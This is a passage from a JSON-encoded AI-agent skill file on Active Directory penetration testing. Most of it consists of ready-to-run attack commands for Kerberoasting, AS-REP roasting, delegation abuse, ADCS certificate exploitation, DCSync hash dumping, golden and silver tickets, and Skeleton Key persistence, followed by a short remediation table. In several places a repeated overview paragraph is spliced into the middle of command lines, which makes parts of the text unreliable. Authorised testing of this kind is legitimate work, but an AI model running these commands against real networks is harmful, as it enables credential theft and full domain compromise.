'corp.local/testuser:Password123' -dc-ip 10.0.0.5 \\\n -outputfile kerberoast.txt -request\n\n# Crack with Hashcat (mode 13100 for Kerberos 5 TGS-REP etype 23)\nhashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt \\\n -r /usr/share/hashcat/rules/best64.rule --force\n\n# Targeted Kerberoasting with Rubeus (Windows)\n.\\Rubeus.exe kerberoast /user:svc_sql /outfile:svc_sql_tgs.txt","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"AS-REP Roasting","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Target accounts without pre-authentication\nimpacket-GetNPUsers 'corp.local/' -usersfile users.txt -dc-ip 10.0.0.5 \\\n -outputfile asrep.txt -format hashcat\n\n# Crack AS-REP hashes (mode 18200)\nhashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Kerberos Delegation Attacks","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Unconstrained delegation — extract TGTs from memory\n# If you compromise a host with unconstrained delegation:\n.\\Rubeus.exe monitor /interval:5 /nowrap\n# Force authentication from DC using PrinterBug/SpoolSample\n.\\SpoolSample.exe DC01.corp.local YOURHOST.corp.local\n.\\Rubeus.exe ptt /ticket:\u003cbase64_ticket>\n\n# Constrained delegation — S4U abuse\nimpacket-getST 'corp.local/svc_web:WebPass123' -spn 'CIFS/fileserver.corp.local' \\\n -dc-ip 10.0.0.5 -impersonate administrator\nexport KRB5CCNAME=administrator.ccache\nimpacket-psexec 'corp.local/[email protected]' -k -no-pass\n\n# Resource-Based Constrained Delegation (RBCD)\nimpacket-addcomputer 'corp.local/testuser:Password123' -computer-name 'EVIL

Performing Active Directory Penetration Test Overview Active Directory (AD) penetration testing targets the central identity and access management system used by over 95% of Fortune 500 companies. The test identifies misconfigurations, weak credentials, dangerous delegation settings, vulnerable certificate templates, and attack paths that enable an attacker to escalate from a standard domain user to Domain Admin or Enterprise Admin. When to Use - When conducting security assessments that involve performing active directory penetration test - When following incident response procedures for rel…

\\\n -computer-pass 'EvilPass123' -dc-ip 10.0.0.5\npython3 rbcd.py -delegate-to 'TARGET

Performing Active Directory Penetration Test Overview Active Directory (AD) penetration testing targets the central identity and access management system used by over 95% of Fortune 500 companies. The test identifies misconfigurations, weak credentials, dangerous delegation settings, vulnerable certificate templates, and attack paths that enable an attacker to escalate from a standard domain user to Domain Admin or Enterprise Admin. When to Use - When conducting security assessments that involve performing active directory penetration test - When following incident response procedures for rel…

-delegate-from 'EVIL

Performing Active Directory Penetration Test Overview Active Directory (AD) penetration testing targets the central identity and access management system used by over 95% of Fortune 500 companies. The test identifies misconfigurations, weak credentials, dangerous delegation settings, vulnerable certificate templates, and attack paths that enable an attacker to escalate from a standard domain user to Domain Admin or Enterprise Admin. When to Use - When conducting security assessments that involve performing active directory penetration test - When following incident response procedures for rel…

\\\n -dc-ip 10.0.0.5 'corp.local/testuser:Password123'\nimpacket-getST 'corp.local/EVIL$:EvilPass123' -spn 'CIFS/target.corp.local' \\\n -impersonate administrator -dc-ip 10.0.0.5","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Phase 3 — ADCS (Active Directory Certificate Services) Attacks","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Enumerate ADCS with Certipy\ncertipy find -u '[email protected]' -p 'Password123' -dc-ip 10.0.0.5 \\\n -vulnerable -stdout\n\n# ESC1 — Vulnerable certificate template (enrollee can specify SAN)\ncertipy req -u '[email protected]' -p 'Password123' \\\n -target ca.corp.local -ca CORP-CA \\\n -template VulnerableWebServer -upn [email protected]\n\n# Authenticate with the certificate\ncertipy auth -pfx administrator.pfx -dc-ip 10.0.0.5\n\n# ESC4 — Template ACL misconfiguration\n# Modify template to enable ESC1 conditions, then exploit as above\n\n# ESC6 — EDITF_ATTRIBUTESUBJECTALTNAME2 flag on CA\ncertipy req -u '[email protected]' -p 'Password123' \\\n -target ca.corp.local -ca CORP-CA \\\n -template User -upn [email protected]\n\n# ESC8 — NTLM relay to HTTP enrollment endpoint\ncertipy relay -target 'http://ca.corp.local/certsrv/certfnsh.asp' \\\n -template DomainController","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Phase 4 — Domain Privilege Escalation","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"DCSync Attack","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# DCSync — extract all domain hashes (requires replication rights)\nimpacket-secretsdump 'corp.local/domainadmin:[email protected]' -just-dc\n\n# DCSync specific user\nimpacket-secretsdump 'corp.local/domainadmin:[email protected]' \\\n -just-dc-user krbtgt\n\n# With Mimikatz (Windows)\nmimikatz# lsadump::dcsync /domain:corp.local /user:krbtgt","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Golden Ticket","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Create Golden Ticket (requires krbtgt hash and domain SID)\nimpacket-ticketer -nthash \u003ckrbtgt_nthash> -domain-sid S-1-5-21-... \\\n -domain corp.local administrator\nexport KRB5CCNAME=administrator.ccache\nimpacket-psexec 'corp.local/[email protected]' -k -no-pass\n\n# With Mimikatz\nmimikatz# kerberos::golden /user:administrator /domain:corp.local \\\n /sid:S-1-5-21-... /krbtgt:\u003chash> /ptt","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Silver Ticket","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Create Silver Ticket for specific service\nimpacket-ticketer -nthash \u003cservice_nthash> -domain-sid S-1-5-21-... \\\n -domain corp.local -spn MSSQL/sqlserver.corp.local administrator\n\nexport KRB5CCNAME=administrator.ccache\nimpacket-mssqlclient 'corp.local/[email protected]' -k -no-pass","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Phase 5 — Persistence Demonstration","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Skeleton Key (inject into LSASS — authorized testing only)\nmimikatz# privilege::debug\nmimikatz# misc::skeleton\n# Now any user can authenticate with \"mimikatz\" as password\n\n# AdminSDHolder persistence\n# Add controlled user to AdminSDHolder ACL\n# SDProp process propagates ACL to all protected groups every 60 minutes\n\n# SID History injection\n# Inject Domain Admin SID into low-privilege user's SID history\n\n# Document all persistence mechanisms and clean up after testing","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Findings and Remediation","type":"text"}]},{"type":"table","attrs":{"layout":null},"content":[{"type":"tr","content":[{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Finding","type":"text"}]}]},{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"CVSS","type":"text"}]}]},{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Remediation","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Kerberoastable accounts with weak passwords","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"7.5","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Use gMSA, enforce 25+ char passwords for service accounts","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Unconstrained delegation on servers","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"8.1","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Remove unconstrained delegation, use constrained or RBCD","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Vulnerable ADCS templates (ESC1-ESC8)","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"9.8","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Audit templates, remove dangerous permissions, require approval","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"DCSync permissions on non-DA accounts","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"9.8","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Audit replication rights, implement tiered admin model","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"LLMNR/NBT-NS enabled","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"8.1","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Disable via GPO","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"No LAPS deployed","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"7.2","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Deploy Windows LAPS for local admin management","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Weak domain password policy","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"6.5","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Enforce 14+ chars, implement fine-grained password policies","type":"text"}]}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"References","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"BloodHound: https://github.com/BloodHoundAD/BloodHound","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Impacket: https://github.com/fortra/impacket","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Certipy: https://github.com/ly4k/Certipy","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"HackTricks AD: https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/index.html","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"SpecterOps AD Security: https://specterops.io/blog/","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"MITRE ATT&CK: https://attack.mitre.org/","type":"text"}]}]}]},{"type":"hr","attrs":{"markup":"---"}}]},"metadata":{"date":"2026-06-05","name":"performing-active-directory-penetration-test","tags":["active-directory","BloodHound","Kerberoasting","Impacket","DCSync","ADCS","domain-compromise","privilege-escalation"],"author":"@skillopedia","domain":"cybersecurity","source":{"stars":13207,"repo_name":"anthropic-cybersecurity-skills","origin_url":"https://github.com/mukul975/anthropic-cybersecurity-skills/blob/HEAD/skills/performing-active-directory-penetration-test/SKILL.md","repo_owner":"mukul975","body_sha256":"290e31bdb7e04c2fb4df1c498b884b9fb45a2fcc1aef21c45dc795006169410a","cluster_key":"392ad2dc7fdda0988777a0cfc545adfd25b61e646842cc7f96a370b31dc94d95","clean_bundle":{"format":"clean-skill-bundle-v1","source":"mukul975/anthropic-cybersecurity-skills/skills/performing-active-directory-penetration-test/SKILL.md","attachments":[{"id":"0028e52f-0619-54b9-90e3-d29d94f53cc7","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/0028e52f-0619-54b9-90e3-d29d94f53cc7/attachment.md","path":"assets/template.md","size":1195,"sha256":"8b93883692ca2fa529d3ca3c6b175e36c324c984dc4471e91df38c6547ee15a0","contentType":"text/markdown; charset=utf-8"},{"id":"25d121ca-3680-57fd-b882-05b61f032573","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/25d121ca-3680-57fd-b882-05b61f032573/attachment.md","path":"references/api-reference.md","size":2314,"sha256":"6a7461913dd1dab7527085cf527f9d54ed1ece0094c88abd804e25396c9fbae8","contentType":"text/markdown; charset=utf-8"},{"id":"583ef094-ae3d-5c95-96e7-7f90454e7386","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/583ef094-ae3d-5c95-96e7-7f90454e7386/attachment.md","path":"references/standards.md","size":1125,"sha256":"524522d0429f13e2365f1c528a14abe420c632a3b2b040be2d3cd067af11666e","contentType":"text/markdown; charset=utf-8"},{"id":"c2e2ea7a-8d64-5d43-955b-f9b36bc65d6a","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/c2e2ea7a-8d64-5d43-955b-f9b36bc65d6a/attachment.md","path":"references/workflows.md","size":1169,"sha256":"d0673170c78afcb6d6c1639581c2e393562061c69a23027b0253f1a5fc6dcb55","contentType":"text/markdown; charset=utf-8"},{"id":"b5739a51-6ee1-5c84-bd9f-ee46e1b38245","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/b5739a51-6ee1-5c84-bd9f-ee46e1b38245/attachment.py","path":"scripts/agent.py","size":7053,"sha256":"4700864467979a016686de234dd11fc993c39055f29abff7477bafd38063eb82","contentType":"text/x-python; charset=utf-8"},{"id":"c1675881-4729-5355-b637-d8974c166f44","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/c1675881-4729-5355-b637-d8974c166f44/attachment.py","path":"scripts/process.py","size":6938,"sha256":"8a29b6c102e08f7d94aa52e16340ec541edc2f99d795933b460e31a08f70dec0","contentType":"text/x-python; charset=utf-8"}],"bundle_sha256":"a0d8e61af9436b5f4cda16bb83be54f45d43ee64bd4cf718d470ac5e1c8587ab","attachment_count":6,"text_attachments":6,"attachment_storage":"skillopedia-attachments-v1","binary_attachments":0,"excluded_attachments":[]},"cluster_size":1,"skill_md_path":"skills/performing-active-directory-penetration-test/SKILL.md","import_metadata":{"date":"2026-06-05","author":"@skillopedia","version":"v1","category":"testing-qa","category_label":"Testing"},"exact_dupes_collapsed_into_this":0},"license":"Apache-2.0","version":"v1","category":"testing-qa","nist_csf":["ID.RA-01","ID.RA-06","GV.OV-02","DE.AE-07"],"subdomain":"penetration-testing","import_tag":"clean-skills-v1","description":"Conduct a focused Active Directory penetration test to enumerate domain objects, discover attack paths with BloodHound, exploit Kerberos weaknesses, escalate privileges via ADCS/DCSync, and demonstrate domain compromise."}},"renderedAt":1782988160749}

Performing Active Directory Penetration Test Overview Active Directory (AD) penetration testing targets the central identity and access management system used by over 95% of Fortune 500 companies. The test identifies misconfigurations, weak credentials, dangerous delegation settings, vulnerable certificate templates, and attack paths that enable an attacker to escalate from a standard domain user to Domain Admin or Enterprise Admin. When to Use - When conducting security assessments that involve performing active directory penetration test - When following incident response procedures for rel…